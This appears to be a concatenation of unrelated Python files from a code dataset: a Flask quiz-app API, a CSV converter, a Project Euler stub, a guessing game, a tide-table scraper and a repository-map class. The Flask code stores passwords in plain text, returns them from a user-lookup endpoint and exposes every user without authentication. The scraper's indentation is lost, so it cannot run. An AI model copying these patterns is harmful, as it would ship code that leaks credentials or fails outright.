# from .models import Quiz, MC_Question, MC_Question_Answer, MC_Question_Options
import json
import ast
import inspect
import uuid
from datetime import date, datetime, time, timedelta
@lm.user_loader
def load_user(user_id):
    """Flask-Login hook: look up a User by primary key.

    Parameter renamed from `id`, which shadowed the builtin; the callback is
    invoked positionally, so the rename is caller-compatible.
    """
    return User.query.get(int(user_id))
@app.before_request
def before_request():
    # Expose the Flask-Login current user on `g` for downstream handlers.
    g.user = current_user
###### API CALLS #######
##find all users
@app.route('/api/v1/find/users', methods=['GET'])
def find_user():
    """Return every user, serialised with User.to_json, as a JSON array."""
    serialised = [User.to_json(u) for u in User.query.all()]
    return json.dumps(serialised)
##get_user with email is DONE
@app.route('/api/v1/users/', methods=['GET'])
def get_user():
    """Fetch one user by EMAIL from the request body, or all users if null."""
    json_data = request.json
    email_user = json_data['EMAIL']
    # print email_user  # debug
    if email_user is None:  # fixed: was `== None`
        # Fixed: this branch previously built `converted` but then fell
        # through to the jsonify below and crashed with AttributeError
        # (a list has no .userName).  Return the serialised list instead.
        users = User.query.all()
        converted = map(User.to_json, users)
        return json.dumps(converted)
    users = User.query.filter_by(email=email_user).first()
    return jsonify({'userName':users.userName,'studentid':users.studentid,
                    'email':users.email,'password':users.password,
                    'isProfessor':users.isProfessor})
##post_user with details is DONE
##post_user for Professors with None as studentid DONE
##returns success/no success depending on creation of user
@app.route('/api/v1/users/new', methods=['POST'])
def post_user():
    """Create a user from the request body; report 'success'/'no success'."""
    json_data = request.json
    user = User(userName=json_data['NAME'],studentid=json_data['ID'],
                email=json_data['EMAIL'],password=json_data['PASS'],
                isProfessor=json_data['PROF'])
    try:
        db.session.add(user)
        db.session.commit()
        status = 'success'
    except Exception:  # fixed: bare `except:` also swallowed SystemExit etc.
        # Roll back so the session is usable after a failed commit.
        db.session.rollback()
        status = 'no success'
    db.session.close()
    return jsonify({'result':status})
##login_user WORKS return token
@app.route('/api/v1/login', methods=['GET','POST'])
def login_user():
    """Authenticate by EMAIL/PASS and mint a one-hour session token."""
    # data = request.data
    # data_dict = ast.literal_eval(data)
    json_data = request.json
    user = User.query.filter_by(email=json_data['EMAIL']).first()
    # NOTE(review): passwords are compared in plain text (no hashing) —
    # flag for a security pass before production use.
    if user and (user.password == json_data['PASS']):
        session['logged_in'] = True
        # Random token persisted on the user row; clients send it back
        # to identify themselves on later calls.
        user_token = uuid.uuid4()
        user.session_token = str(user_token)
        db.session.commit()
        curr_time = datetime.now()
        expr_time = datetime.now() + timedelta(hours=1)
        # Server-side session expires after one hour.
        session.permanent = True
        app.permanent_session_lifetime = timedelta(hours=1)
        print user.userName
        print user.isProfessor
        print user_token
        status = True
        return jsonify({'result':status,'isProfessor':user.isProfessor,'token':user_token})
    else:
        status = False
        return jsonify({'result':status})
##logout_user with login token WORKS
@app.route('/api/v1/logout', methods=['POST'])
def logout_user():
    """Invalidate the session token supplied in the request body."""
    json_data = request.json
    user_token = json_data['TOKEN']
    # BUG FIX: filter_by() returns a Query, so the original assigned
    # session_token on the Query object and never touched the row.
    # Fetch the actual User and clear its token.
    curr_user = User.query.filter_by(session_token=user_token).first()
    if curr_user is not None:
        curr_user.session_token = None
        db.session.commit()
    return jsonify({'result': 'logged_out'})
#get_classes with login token WORKS
@app.route('/api/v1/classes', methods=['GET','POST'])
def get_classes():
    """List the classes the token's user is enrolled in, as JSON."""
    token = request.json["TOKEN"]
    user = User.query.filter_by(session_token=token).first()
    payload = [Allclass.to_json(c) for c in user.enrolled]
    return json.dumps(payload)
@app.route('/api/v1/testclasses/<token>', methods=['GET'])
def test_classes(token):
    """Debug variant of get_classes: the token comes from the URL path."""
    user = User.query.filter_by(session_token=token).first()
    payload = [Allclass.to_json(c) for c in user.enrolled]
    return json.dumps(payload)
##find_classes DONE without any parameters
@app.route('/api/v1/find/classes',methods=['GET'])
def find_classes():
    """Return every class in the system as a JSON array."""
    every_class = Allclass.query.all()
    return json.dumps([Allclass.to_json(c) for c in every_class])
#post_class WORKS without the only professor logic
@app.route('/api/v1/classes/new', methods=['POST'])
def post_class():
    """Create a class and enrol the requesting user (found by session token)."""
    json_data = request.json
    # print data_dict
    userToken = json_data['TOKEN']
    classes = Allclass(title=json_data['TITLE'],semester=json_data['SEMESTER'],
        callsign=json_data['CALLSIGN'],CRN=json_data['CRN'],session=json_data['SESSION'],
        start_time=json_data['start_time'],end_time=json_data['end_time'])
    Curr_users = User.query.filter_by(session_token=userToken).first()
    # Link the creator to the new class before persisting it.
    classes.users.append(Curr_users)
    db.session.add(classes)
    db.session.commit()
    return jsonify({'result':'success','title':classes.title})
    # else:
    #     return jsonify({'result':'no success'})
@app.route('/api/v1/classes/quiz/new')
def post_question():
    # NOTE(review): UNFINISHED endpoint — it will raise at runtime:
    #  * route declares no methods=['POST'] despite reading request.json,
    #  * `Curr_class` is read before assignment below,
    #  * `questionNumber` and `whatever` are undefined,
    #  * Quiz/MC_Question models are commented out in the imports above,
    #  * no response is returned.
    # Pull the question payload out of the request body.
    json_data = request.json
    #
    userToken = json_data['TOKEN']
    classCRN = json_data['CRN']
    activeQuestion = json_data['ACTIVEQ']
    questionText = json_data['TEXT']
    # Answer choices arrive as a single '|'-delimited string.
    options = json_data['CHOICES']
    optionsList = options.split('|')
    answer = json_data['ANSWER']
    Curr_users = User.query.filter_by(session_token=userToken).first()
    # NOTE(review): presumably this was meant to query Curr_users.enrolled —
    # confirm intent before fixing.
    Curr_class = Curr_class.enrolled.filter_by(CRN=classCRN).first()
    Curr_class_id = Curr_class.id
    post_Options = MC_Question_Options(questionID=questionNumber,description=whatever)
    post_Question = MC_Question()
    post_Quiz = Quiz()
|
"""Homework 7 tabs_to_commas for CSE-41273"""
# Yukie McCarter
import csv
import sys
OUTPUT_FILE = "_commas.csv"
def tab_to_comma(in_file, out_file):
    """Convert a tab-delimited file *in_file* to comma-delimited *out_file*.

    The header row is preserved; rows are copied via DictReader/DictWriter.
    """
    # newline='' lets the csv module control line endings itself, per the
    # csv docs (prevents blank rows on Windows).
    with open(in_file, newline='') as input_file, \
            open(out_file, 'w', newline='') as output_file:
        reader = csv.DictReader(input_file, delimiter='\t')
        writer = csv.DictWriter(output_file,
                                reader.fieldnames,
                                delimiter=',')
        writer.writeheader()
        writer.writerows(reader)
if __name__ == "__main__":
    # Fixed: the original wrapped everything in a bare `except: pass`,
    # silently swallowing every error including missing arguments.
    if len(sys.argv) < 2:
        sys.exit("Usage: tabs_to_commas.py <input_file>")
    in_file = sys.argv[1]
    if "." in in_file:
        # Derive the output name from the stem of the input file.
        out_file = in_file.split('.')[0] + OUTPUT_FILE
        tab_to_comma(in_file, out_file)
    else:
        print("You need a file extension")  # fixed typo: "extention"
|
# Solution of;
# Project Euler Problem 384: Rudin-Shapiro sequence
# https://projecteuler.net/problem=384
#
# Define the sequence a(n) as the number of adjacent pairs of ones in the
# binary expansion of n (possibly overlapping). E. g. : a(5) = a(1012) = 0,
# a(6) = a(1102) = 1, a(7) = a(1112) = 2Define the sequence b(n) = (-1)a(n).
# This sequence is called the Rudin-Shapiro sequence. Also consider the
# summatory sequence of b(n): $s(n) = \sum \limits_{i = 0}^{n} {b(i)}$. The
# first couple of values of these sequences are:n 0 1 2 3 4 5 6 7a(n) 0 0 0 1
# 0 0 1 2b(n) 1 1 1 -1 1 1 -1 1s(n) 1 2 3 2 3 4 3 4The sequence s(n) has the
# remarkable property that all elements are positive and every positive
# integer k occurs exactly k times. Define g(t,c), with 1 ≤ c ≤ t, as the
# index in s(n) for which t occurs for the c'th time in s(n). E. g. : g(3,3) =
# 6, g(4,2) = 7 and g(54321,12345) = 1220847710. Let F(n) be the fibonacci
# sequence defined by:F(0)=F(1)=1 andF(n)=F(n-1)+F(n-2) for n>1. Define
# GF(t)=g(F(t),F(t-1)). Find $\sum$ GF(t) for 2≤t≤45.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
    """Placeholder for the Problem 384 solver; returns None for any input."""
    return None
if __name__ == '__main__':
    # Benchmark harness parameters: input size, iteration count, problem id.
    n, i, prob_id = 1000, 10000, 384
    timed.caller(dummy, n, i, prob_id)
|
from random import randint
def sorteio(valor):
    """Guessing game: keep prompting until `valor` matches a random 1-100 draw."""
    aleatorio = randint(1,100)
    # The initial guess passed in counts as the first attempt.
    palpite = 1
    while valor != aleatorio:
        if valor > aleatorio:
            print("Informe um valor menor!")
        elif valor < aleatorio:
            print("Informe um valor maior!")
        palpite += 1
        valor = int(input("Informe um novo palpite: "))
    print(f"Parabéns você acertou o número com {palpite} palpites!")
# Read the player's first guess and start the game loop.
numero = int(input("Diga um palpite de um número entre 1 e 100: "))
sorteio(numero)
'''
Uses data from Belfast-Harbour.co.uk/tide-tables to
print the tides that are greater than 3.5 meters
'''
import urllib
import re
url = 'https://www.belfast-harbour.co.uk/tide-tables/'
regexDepth = '<span class="depth">(.+?)</span>' #An array of whatever is between the two span tags
patternDepth = re.compile(regexDepth) #comile into a form that the re library can use
regexDay = '<span class="day">(.+?)</span>'
patternDay = re.compile(regexDay)
regexOrdinal = '<span class="ordinal">(.+?)</span>'
patternOrdinal = re.compile(regexOrdinal)
regexMonth = '<span class="month">(.+?)</span>'
patternMonth = re.compile(regexMonth)
htmlfile = urllib.urlopen(url)
htmltext = htmlfile.read()
# print htmltext
depthArray = re.findall(patternDepth,htmltext)
dayArray = re.findall(patternDay,htmltext)
ordinalArray = re.findall(patternOrdinal,htmltext)
monthArray = re.findall(patternMonth,htmltext)
i=0
j=0
k=0
print "Some of the heights may have the incorrect date because the website that the data comes from has some empty boxes in the table"
while i< 7: #There are 30 days but we only want the first 7
k = 0 #k gets reset to 0 because of each row
while k< 4:
if float(depthArray[j]) >= 3.5 : #if the depth is more than 3.5 meters print it
print dayArray[i] + ordinalArray[i] + " " + monthArray[i] + " " + depthArray[j] + "m" #e.g. 20th August 3.7m
j+=1
k+=1
i+=1
|
import json
import os.path
from collections import Mapping
from pathlib import Path
from typing import List
class RepositoryMap(Mapping):
    """Represents a JSON view of a git repository file structure.

    >>> repo_map = RepositoryMap('repo')
    >>> repo_map.add_path('path/to/file.txt')
    >>> repo_map.add_path('path/to/another_file.txt')
    >>> repo_map
    <RepositoryMap at 0x1063dc700> JSON: {
      "repo": [
        {
          "path": [
            {
              "to": [
                "file.txt",
                "another_file.txt"
              ]
            }
          ]
        }
      ]
    }
    """
    def __init__(self, repo_name: str, filter_extensions: List[str] = None):
        # An empty/None filter means "accept every extension" (see add_path).
        self.repo_name = repo_name
        self.filter_extensions = filter_extensions or []
        self._repo_map = {self.repo_name: []}
    def add_path(self, path: str) -> None:
        """Add a path to the repository map.

        When `filter_extensions` is non-empty, files with other extensions
        are silently skipped.  (Fixed: an empty filter used to reject every
        file, contradicting the class docstring example above.)
        """
        *path_bits, file = Path(path).parts
        extension = os.path.splitext(file)[1][1:]
        if self.filter_extensions and extension not in self.filter_extensions:
            return
        current_path = self[self.repo_name]
        for bit in path_bits:
            # Find the first dict in the current level that has a `bit` key,
            # creating it when missing.
            folder = next(
                (folder for folder in current_path
                 if isinstance(folder, dict) and bit in folder),
                None
            )
            if folder is None:
                folder = {bit: []}
                current_path.append(folder)
            current_path = folder[bit]
        # Do not add a file if it already exists at this level.
        if file not in current_path:
            current_path.append(file)
    def __getitem__(self, key):
        return self._repo_map[key]
    def __iter__(self):
        return iter(self._repo_map)
    def __len__(self):
        return len(self._repo_map)
    def __str__(self):
        # Pretty-printed JSON, matching the docstring example.
        return json.dumps(
            self.as_dict(),
            sort_keys=True,
            indent=2,
        )
    def __repr__(self):
        return f"<{self.__class__.__name__} at {hex(id(self))}> JSON: {self}"
    def as_dict(self) -> dict:
        """Return the repo map as a dictionary.

        It can be useful in some cases,
        where the :class:`Mapping` is not supported or does not act like a default dict,
        but calling a `dict()` function is unwanted due to performance issues.
        """
        return self._repo_map.copy()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.